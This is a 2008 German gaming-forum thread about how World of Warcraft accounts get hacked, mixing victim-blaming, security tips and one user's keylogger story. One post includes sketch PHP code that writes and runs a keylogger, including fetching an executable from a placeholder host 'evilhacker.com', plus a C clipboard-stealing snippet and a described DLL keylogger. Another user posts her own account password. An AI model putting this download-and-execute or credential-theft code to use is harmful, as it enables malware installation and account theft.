Schon nach der Geheimfrage kriegt man (z. bei yahoo ein PW.
Kommt eben immer drauf an.


----------



## Redday (20. September 2008)

jeder, der "gehackt" wird, ist selber schuld. hat sich halt irgendeinen blödsinn runtergeladen von dubiosen seiten und dann auch noch seinen computer nicht entsprechend geschützt. keylogger, trojaner usw.

wie gesagt: selber schuld.


----------



## Focht (20. September 2008)

Redday schrieb:


> jeder, der "gehackt" wird, ist selber schuld. hat sich halt irgendeinen blödsinn runtergeladen von dubiosen seiten und dann auch noch seinen computer nicht entsprechend geschützt. keylogger, trojaner usw.
> 
> wie gesagt: selber schuld.
> 
> ...


----------



## Caidy (20. September 2008)

ich denk auch das man selber schuld ist, entweder hat man sein pw weitergegebenan "freunde", irgendwelche lvldienste etc benutzt oder ben keylogger trojaner etc aufm rechner.


Ich selbst hab kein super tolles pw und wurd in 3 1/2j noch nie gehackt, mein freund ebensowenig. 

also muss da schon was dran sein



der blizzkey is zwar sicherlich ne hilfe, aber man muss kein geld für dummheit ausgeben, sondern einfach schlau werden^^


----------



## neo1986 (20. September 2008)

Selber schuld?
Nicht immer oft ist es auch dummheit oder  unwissenheit.
Wenn jemand z.b. eine gefakte E-mail von Blizzard bekommt und denkt sie sei wichtig dan öffnet er die und schwup die wup könnte er ein keylogger haben. Genauso giebt es solche e-mails von banken oder wenn man seine telefonrechnung online bekommt jede e-mail kann gefaikt sein.


----------



## Saphirà (20. September 2008)

mein tipp: kauft euch den blizzart authentificator und ihr könnt nimmer gehacked werden :-)


----------



## nuriina (20. September 2008)

Also mein Accountname ist nuriina1991 und mein passwort ist g/d1991pwn und das hat noch niemand gehackt. :-)


----------



## Master of madness (20. September 2008)

nuriina schrieb:


> Also mein Accountname ist nuriina1991 und mein passwort ist g/d1991pwn und das hat noch niemand gehackt. :-)


ich frag mich wie viele das jetzt testen^^


----------



## Andros-LL (20. September 2008)

Hört sich an als würdest du gerne auch Hacken. Also hoffe ich mal das du keine Antworten bekommen wirst.


----------



## Ohmnia (20. September 2008)

Kabuumm_Azshara schrieb:


> Hacken allein is ja nichts schlimmes, nur die meisten Leute wissen nichtmal, dass es da auch noch cracken gibt... Und cracken is eben das, was Schaden verursacht, nicht hacken.
> 
> Ich selber wurde gefühlte 3 mal gehackt. Strafe genug
> 
> ...



Ich wurde heut zum 2ten mal gehackt und ich weiss auch mit ziemlicher Sicherheit wieso.

Ich wollte für meine neue Gilde eine Page inkl Raidplaner erstellen. Bereits als ich dies für eine andere Gilde machte, meldete mein Anti-vir nach dem Download von Spiffyjr Php-Raidplaner jedoch wurde die "Gefahr" als niedrig eingestuft und ich dachte mir nix dabei... ergo mein Account wurde gehackt.. nachdem ich Spydoctor laufen lies fand er einen Keylogger mit dem Namen wow-keylogger.exe und einen passwortstealer.exe.

Nundenn heut morgen so gegen 6.30 wachte ich auf und wollte wiederum einen Raidplaner für die Gilde einbauen und lud mir einen anderen phpraid runter. Wiederum gescannt und für Sauber befunden. Ich Installier das ding auf der Server, configuriere es und ess er mal Frühstück, Rauch ne Zigi und trink n Kaffee und als ich dann die Seite aufrufe meldet mir Bitdefender "achtung diese Seite versucht "wow-keylogger.exe" zu installieren, blockieren - zulassen etc.. 

Ich blocke das Teil.. gerate in Panik, lösche das ganze Verzeichnis auf dem Server logge kurz ins Spiel ein und stelle fest alle meine Chars sind nackig, Inv + Bank leer sowie Gold weg.... Gildenchef ist Online und beklagt sich das ich über 44 Kristalle der Leere und was auch immer aus der Gildenbank nahm.

Ok Panik pur.. GM Ticket eröffnet; on-screen Keyboard an.. auf die Wow-Account Page um Passwort zu ändern jedoch war der Hacker schneller..

Ich glaube kaum das ein 0815 Hacker der dich per Trojaner hackt mit Absicht auf Onlinebanking Daten oder derartiges, sich schnell WoW installiert und deine Chars plündert. Bin mir zu fast 100% sicher das solche WoW Hacker von speziell als WoW Fansiten oder Add-on Seiten die z.B PhpRaid Versionen zum Download anbieten.. Wow Accounts hacken; kommen. Passt also bitte alle in Zukunft auf wenn ihr irgendwelche Add-ons sei es für's Spiel oder für Eure Wow Internetseiten downloadet... 

Keine Sorge meinen Account hab ich wieder, der Passwort Reset seitens Blizz dauerte kaum 30 Minuten. Momentan wird an der Wiederherstellung meiner Chars und der Items aus der Gildenbank gearbeitet, aber es geht nicht immer so gut.. es kann echt schlimmer kommen also passt auf.. was ich mir selber auch hinter die Ohren schreiben werde.


----------



## Shurycain (23. November 2008)

Navyraiser schrieb:


> alsoo ich war ca. n halbes jahr in der underground szene hab zwar keine wow accounts gehackt aber naja..eins vorweg wenn dich wirklich jemand hacken will denn schafft derjenige es auch. in den meisten fällen wird es durch trojaner gemacht das sind kleinste datein ca. 300kb groß diese stecken sie in große datein wie z.b. mp3s bieten diese als download an.. du lädst diese runter klickst auf den mp3 (trojaner) und du bist hacked. der jenige der den trojaner on gestellt hat hat vollen zugriff auf dein pc kann sehen was du schreibst (keylogger) kann datein von deinem pc laden datein auf dein pc mache z.b. neue viren etc. und sonmit kann derjenige auch ganz leicht die wow daten "besorgen". ich will jetzt kein roman schreiben deswegen geb ich dir jetzt ein paar tipps.. firewall: windows firewall reicht antivir: ich benutze antivir reicht vollkommen damit scannst du deine dateien die du dir geloadet hast bevor du diese nur anklickst filesharing: nicht sehr ratsam falls ja pass auf was du loadest und scann die datein bevor du diese benutzt. internetbrwoser: is egal nach deiner wahl. das aller wichtigste ist geh auf keine seiten die dir nicht vertraunswürdig erscheinen lad keine datein herunter die dir nicht vertraunswürdig erscheinen. leute die dich einfach bei icq adden und dir datein senden ..NICHT anehmen ganz klar. zum schluss nochmal pass auf wo du dich im www bewegst und denk dran wenn jemand dich hacken will schafft derjenige es auch.
> 
> rechtschreibfehler könnt ihr behalten
> 
> ...



Einfach nur lol wenn Leute nicht erkennen wie lächerlich Sie sich machen.



Scárfáce123 schrieb:


> allein dieses und du bist hacked sagt alles aus was du über hacken weisst Mr. Untergrundszene rofl
> 
> zum thema: einen keylogger/trojaner bekommt man nicht sondern man holt ihn sich das heisst egal was es is selbst schuld kein mitleid
> 
> ...



/sign


----------



## Lari (23. November 2008)

Bissel weniger auf Porno-Seiten rumsurfen, nicht jeden Scheiss glauben, den man im Internet sieht (Sie sind der 999.999 Benutzer *bling bling*) und vor allem: Kopf einschalten.
Denn der Hacker kommt durch den User an die Daten.


----------



## Spochtl (24. November 2008)

Ohmnia schrieb:


> Ich wurde heut zum 2ten mal gehackt und ich weiss auch mit ziemlicher Sicherheit wieso.
> 
> Ich wollte für meine neue Gilde eine Page inkl Raidplaner erstellen. Bereits als ich dies für eine andere Gilde machte, meldete mein Anti-vir nach dem Download von Spiffyjr Php-Raidplaner jedoch wurde die "Gefahr" als niedrig eingestuft und ich dachte mir nix dabei... ergo mein Account wurde gehackt.. nachdem ich Spydoctor laufen lies fand er einen Keylogger mit dem Namen wow-keylogger.exe und einen passwortstealer.exe.
> 
> ...



Ob ein solches Script als Gefährlich einzustufen ist würde ich leicht bezweifeln.
An sich sollte man vielleicht einmal das Script ansehen ob es Daten an eine Zweitstelle sendet, das kann aber wohl kaum der WoW Account sein. Keylogger in PHP gibt es nicht, wer das behauptet hat den Sinn nicht verstanden. Wer das WoW Passwort und den Zugangsnamen woanders verwendet bzw. im Zusammenhang mit WoW, tja pech gehabt.
Wie du dir nun was eingefangen hast von einem PHP Script würde ich gerne wissen, aber möglich ist es nur wenn der PHP Parser die Files verarbeitet, den PHP Dateien sind nichts anderes als Textdateien (.txt, .rtf) und Technisch unmöglich wäre es darüber Schadcode zu starten wenn nicht ein ganz Spezieller Fehler im Leseprogramm ausgenutzt wird.

Möglich wäre dass das PHP Script ein Programm schreibt und ausführt (wenn es vom PHP Parser ausgeführt wird), z.B.:


```
<?php
// Virus Schreiben und ausführen
$file = fopen ("c:\\mykeylogger.exe", "w+");
$Shellcode ="x68\x61\x75\x74\x68.....";
fwrite ($file, $Shellcode);
fclose($file);
system("c:\\mykeylogger.exe");
?>
```

oder besser


```
<?php
// Virus oder Keylogger von einem externen Server öffnen und einlesen in $Programm
$file = fopen(ftp://hans:wurst@evilhacker.com/raidsachen/raidprogramm.exe, 'r+');
$Programm = fread($fh, filesize($file));
fclose($fh);

// Virus Schreiben und ausführen
$file = fopen ("c:\\mykeylogger.exe", "w+");
fwrite ($file, $Programm);
fclose($file);
system("c:\\mykeylogger.exe");
?>
```


Der Shellcode ist bei weitem nicht lauffähig, ist nur ein Platzhalter damit man sieht wie sowas aussehen könnte. Sowas wird einfach sehr gerne bei Code Injection auf Webservern verwendet und über schlecht Programmierte Scripte einfach als Include eingefügt. Beispiel:



> HTTP/1.1 500 Internal Server Error
> Connection: close
> Transfer-Encoding: chunked
> Content-Type: text/html; charset=iso-8859-1
> ...



Wer also daheim einen Webserver laufen hat der Extern erreichbar ist, dem kann es leicht passieren das seine Kiste plötzlich sachen macht die sie nicht machen sollte. Rootkits sind schnell installiert und Logs fix gelöscht, gibt es alles bei Milw0rm, THC oder Packetstormsecurity zum Runterladen.
Wenn du spaß hast kannst du ja mal den Code von PHPRaid lesen ob da was verdächtiges vorkommt, ansonsten bezweifle ich dass das Programm schuld daran war. Ist eben immer befreihend für manche Ihre Fehler einem Programm zuzuschreiben 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 So schnell wie du beschreibst das der Account leer war denke ich das es eher Zufall war, aber wie gesagt, kannst ja mal den Code durchsehen oder mich per PM mal anschreiben. Ich denke aber eher das dein Webserver der bösewicht ist und nicht das Script (nutzt du etwa den Kindernet Explorer? Kein Wunder das er versucht sachen zu installieren). Was die Programme angeht glaube ich übertreibst du, keiner nennt seine Programme SO das sie gleich auffallen.

Ansonsten...
Addons im Spiel können gar nicht Schuld daran sein, denn die Addons werden erst geladen wenn du dich mit deinem Char einloggen möchtest und nicht vorher. Einzige Einfallstore sind und bleiben:

- Keygens oder andere Crack Programm um deine Software "Legal" zu machen incl. nettem Anhang (Ihr wisst gar nicht was ich von Kundenrechner schon runter hab)
- schlechtes oder kurzes Passwort
- Passwort wiederverwendet
- Passwort weitergegeben
- Kein Mailprogramm, nur über die Freemailer Oberfläche die Mails ankucken und dort ein dummes Passwort haben. Wer seine ganzen Emails mit Logins etc. Online abspeichert gehört sich sowisso gestiefelt.

In WoW hab ich ein eigenen Loginnamen der sich aus meinem normalen Loginnamen ableiten lässt und ein eigenes Passwort mit 10 Stellen (incl. Zahlen und Sonderzeichen, Groß-/Kleinschreibung ist dummerweise egal 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 )
Definitiv nach einem Accounthack sollte man seine Kiste neuaufsetzen weil man nicht weiß was daran schuld war und auf der Sauber installierten Kiste (keine Cracks, Keygens etc. gestartet) den Firefox aufmachen und das Passwort von WoW ändern wenn man es noch kann. Vorher wäre es zu riskant weil ja das System kompromittiert sein könnte. Verlasst euch nicht auf Virenscanner, die sind so genau das ich gleich mit Taktischen Nuklearwaffen auf Taubenjagt gehen kann. Was Sie finden wollen finden Sie oft nicht, was Sie nicht finden sollen, löschen Sie gerne. Kaspersky und TrendMicro  sind da recht vertreten mit false positives.

Wer der Englischen Sprache mächtig ist, ich hab da für die Leute ein einfaches Lehrvideo auf Youtube das mal ein bisschen was zu Passwort Sicherheit erzählt, kuckt es euch an:
http://www.youtube.com/watch?v=rB6Q6NosZdA


MFG



p.s. Ob es in WoW geht weiß ich nicht, aber ein Trick gegen Keylogger soll sein: das Passwort in eine Textdatei zu schreiben und vor dem Einloggen einfach aufzumachen, Passwort markieren und per STRG+C kopieren, WoW Starten und im Passwortfeld per STRG+V einfügen. Aber das geht nur bei schlechten Keyloggern, gute überprüfen auch das. In meinen Unterlagen steht der Codeschnippsel hier:


```
char * buffer;
if(OpenClipboard())
{
		buffer = (char*)GetClipboardData(CF_TEXT);
}
CloseClipboard();
```

Damit enthält der buffer jetzt den Inhalt der Zwischenablage. Einfach, aber es soll gehen.

p.p.s
Alles was ich gepostet habe dient zum Verständniss und nicht zum nachmachen bei Fremden Rechnern. Es funktioniert sowisso nur ein Bruchteil, also schreibt mich nicht an oder meckert das ich ach so böse Sachen poste. Rechtschreibfehler könnt Ihr behalten 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## silver18781 (25. November 2008)

ich habe geheult vor lachen als ich alles durchlas







GELACHT WEIL IHR ALLE SO DUMM SEID UND EUCH HACKEN LASST!
ich bekomm mich netmehr ein :x


----------



## novemberkind (25. November 2008)

Hmm, warum nutzt Ihr nicht den Blizzard Authentificator?  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 
Es kann doch so einfach sein...schon is Sense mit Keyloggern 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 Außer diese können in den wenigen Sekunden der Gültigkeit des Keys sich in euren Account einlogen und eure Daten ändern (was auch keinen Sinn macht, denn beim nächsten einloggen braucht es wieder den Key)..solange der Algorithmus des Authentificators nicht geknackt wird, so lang is das die absolut sicherste Variante...und wat kostet der? 6&#8364; im Blizzard Shop... 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## nuriina (25. November 2008)

Spochtl schrieb:


> ```
> char * buffer;
> if(OpenClipboard())
> {
> ...



Geht aber nur beim IE, und wird mitlerweile von den meisten Virenscannern gestoppt. Nichts destotrotz hats lange Zeit echt gut funktioniert. ^^ Man kann das auch schön anpassen, dass man per PHP einfach mit einem Link ein Bild liefert (z.Bsp den Link dann per ICQ verschicken.. schau mal voll witziges Foto) und im Hintergrund das Script läuft. Hab das natürlich nur zu Testzwecken gemacht und nie damit Passwörter ausspioniert.


----------



## Azuriel (25. November 2008)

ich warte schon drauf, dass die ersten panikmacher schreien:

"der Spieler XY ist ein Virus. Wenn ihr ihn in die friend-list aufnehmt wird euer Account gehacked" rofl


----------



## Spochtl (26. November 2008)

[DM]Zottel hat mich gerade per PM angeschrieben das ich doch glatt was vergessen habe 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Die Externen Addonprogramme wie BLASC, WoW Matrix, Curse usw. nehme ich von den ganzen Addons aus, die könnten in der Theorie einen Keylogger mitbringen, weswegen ich die dinger auch nicht wirklich mag 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 Schreibt euch die Addons bzw. die URLs raus und speichert sie in eine Textfile und wenn es ärger mit einem Addon gibt, manuell Downloaden. Man weiß ja nicht wer der liebe Programmierer ist und mit was er seinen Lebensunterhalt verdient 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



@nuriina
Der C++ Code ist für einen Trojaner gedacht und muss übersetzt (kompiliert) werden mitsamt dem restlichen Programm. Daraus eine kleine Klasse ableiten die bei STRG+[X|C] aktiviert wird und dann geht das. Haben wir in der Schule mal mit Windows NT gemacht und 2000, lief 1A. Der Keylogger wurde als DLL bei der Winlogon.exe eingebunden und hat die Daten über einen IE BHO senden können (wir erinnern uns? Iexplorer.exe möchte eine Verbindung nach draussen herstellen, zulassen oder blockieren? Lasst Ihr die exe zu wird Sie auf eine Whitelist gesetzt und jeder Traffic wird einfach gesendet).
Möglich waren auch Bilder mit Shellcode im Kommentarfeld, das ist aber wirklich sehr lange her. BHO´s sind auch immer beliebter geworden, daher ist der IE einfach nicht nutzbar als Browser (auch 7.0 nicht). Wer erinnert sich noch an CoolWebSearch usw. die einfach die Daten an ein Spyware Unternehmen gesendet haben und man dann prima Werbung bekam 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Früher war es teilweise möglich das Clipboard per Javascript auszulesen, das funktionierte aber nur auf der jeweiligen Seite da Javascript nur in der jeweiligen Instanz der Domain zulässig war was bestimmte funktionen angeht.

Was möglich wäre, ist eine ActiveX Control zu bauen die dann entsprechend ausbricht. Allerdings sind die im aktuellen IE 7 sogar ausgeschalten und müssen händisch freigegeben werden. Auch Youtube war mal eine Zeitlang ein Verteiler für solchen Müll dank einer möglichkeit aus dem Flashplayer auszubrechen und mit den Rechten des Browsers (bei XP eben Userrechte, bei Vista mit geringen Rechten) Code auszuführen.

Lustig war auch das hier
http://www.heise.de/newsticker/Werbe-Troja...-/meldung/85343

Aber wie gesagt sind das meist Ausnahmen und wenn man sein System aktuell hält, nicht auf jeden Müll klickt, dann ist das kein Problem.


----------



## bma (26. November 2008)

niemals das PW jmd. geben außer deinem Kopf  =)  und selbst dem würde ich net vertraun


----------



## cazimir (26. November 2008)

Korri schrieb:


> Und wie schützen sich dann Blizz und buffed vor Hackern wenn jeder der will jeden hacken kann?



Etwas spät aber xD :
- Nur bestimmte Ports durchlassen.
- Paketfilter
- Rechtevergabe auf Prozesse

Ja unbequemer der Rechner ist, desto sicherer ist er meistens.


----------



## Stonewhip (26. November 2008)

Deine Ansätze sind gut, aber...



cazimir schrieb:


> - Nur bestimmte Ports durchlassen.


Permanente Öffnung der Ports? Was ist in der Zeit, wo mal KEINE Anwendung (WoW) diese Ports nutzt? Bei 11mio WoW-Spielern ist es recht leicht, diese offenen Stellen am Router ausfindig zu machen. Und UPNP ist dabei auch keine Hilfe, denn es macht die Sache (wenn der Schädling mit etwas Aufwand und Geschick geschrieben ist) nur noch schlimmer, da er sich selber Tür und Tor öffnen kann.

Möchte nur an Battlefield2 erinnern, welches 6614 OFFENE Ports erfordert (Incl. des gefährdeten Port 80). Und das nur auf der Clientseite. Von STEAM und einigen anderen möchte ich erst garnicht anfangen.



cazimir schrieb:


> - Paketfilter


Separate Software zu installieren, die im Endeffekt anfälliger ist, als die hardwareseitige Paketfilterung im Router (aber das Gleiche macht) scheint für viele nicht sinnvoll. Ja sogar eher gefährdend, da es ja wieder ein weiterer (Software)-Baustein ist, der Ziel von Angriffen werden könnte. Wer verläßt sich schon auf EINE Software, die, wenn die deaktiviert würde, meinen Rechner EXTREM angreifbar macht?



cazimir schrieb:


> - Rechtevergabe auf Prozesse


Nicht jeder X-beliebige User hat ein Betriebssystem installiert, was dieses ermöglicht. Alleine die "kleinen" Windowsversionen (die ja zu Hauf von den PC-Herstellern mitvertrieben werden/wurden, ermöglichen dieses schonmal garnicht. Weiter ist nicht davon auszugehen, dass ein "Otto-Normal-Spieler" soviel Zeit und Interesse hat, wenn er "nur" WoW spielen möchte, sich in diese Materie einzuarbeiten.

Eine Kombination aus allem, wäre ein guter Schritt, aber leichtfertig konfiguriert tut man sich da keinen Gefallen mit. Ich erinnere gerne an ZoneAlarm, das (eigentlich) ein SEHR GUTES Sicherheitstool ist, aber zumeist katastrophal konfiguriert ist, da kaum einer weiß, welchen Prozessen/Threads eine Erlaubniss für irgendwas erteilt werden darf/sollte, und welchen nicht. Im Zusammenspiel mit cryptischen Datei- und Prozess- oder Dateinamen wie "svhost.dll" oder "lsass.exe" ist der Laie sehr schnell überfordert und gibt auf.

Im Endeffekt, ist es die Faulheit (jo, nicht nur beim Questen und lesen der Questlogs gibt es das...) und Leichtfertigkeit, Warnmeldungen zu ignorieren oder sich wenigstens einmal durchzulesen, wenn sie aufploppen gepaart mit der Flut dieser Meldungen, die es einen irgendwann müde machen, noch angemessen darauf zu reagieren. Wenn ich 500x eine Fehlermeldung weggeklickt habe, automatisieren sich manche Abläufe, ohne dass ich sie noch besonders beachte.

Aber es ist wie beim Autofahren: wenn ich eine Routine in meinen Fahrstil bekomme, baue ich den ersten Unfall !

Manche vergessen einfach, dass das Internet ein "Ort" ist, der sich ständig (soweit das Wort "ständig" überhaupt ausreicht, um die permanenten Veränderungen zu beschreiben) wandelt, und zwar in einem Ausmaß, das nur wenige erfassen können.

Und zu den PhP-Scripten: Wenn ein findiger "crack" den Planer soweit modifiziert, dass der Logger/Trojaner... whatever.. als getarnte Datei (innerhalb des Planer-Scripts aka der Dateien und Ordner die ihn beinhalten) auf den Server kommt (meist von Leuten, die sich das, was sie heruntergeladen haben, nicht mal genauer ansehen, sondern nur entpacken und "auf den Server schmeissen"), ist es leicht, dem User, beim ersten nmelden "irgendwas" zu schicken, dass der Planer ja UNBEDINGT auf dem Client benötigt 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



"Installiere PHPrPclient_v4.32.exe? - Jo, muss wohl dazugehören. Ok."

vv                                vv                               vv                         vv

"Eröffne buffed.de-Thread: Mein Account wurde gehackt." ?? - 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 

In diesem Sinne..


----------

